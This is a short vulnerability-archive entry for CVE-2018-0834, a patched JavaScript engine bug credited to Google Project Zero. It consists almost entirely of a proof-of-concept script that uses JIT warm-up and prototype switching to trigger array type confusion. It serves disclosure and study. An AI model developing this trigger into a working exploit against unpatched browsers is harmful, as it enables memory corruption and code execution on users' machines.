CVE-2018-0834.md

CVE-2018-0834

• Fix: Feb 2018
• Credit: lokihardt of Google Project Zero

PoC

function opt(arr, proto) {
    arr[0] = 1.1;
    let tmp = {__proto__: proto};
    arr[0] = 2.3023e-320;
}

function main() {
    let arr = [1.1, 2.2, 3.3];
    for (let i = 0; i < 10000; i++) {
        opt(arr, {});
    }

    opt(arr, arr);
    print(arr);

}

main();

Reference

• Microsoft
• Google Project Zero
• Fix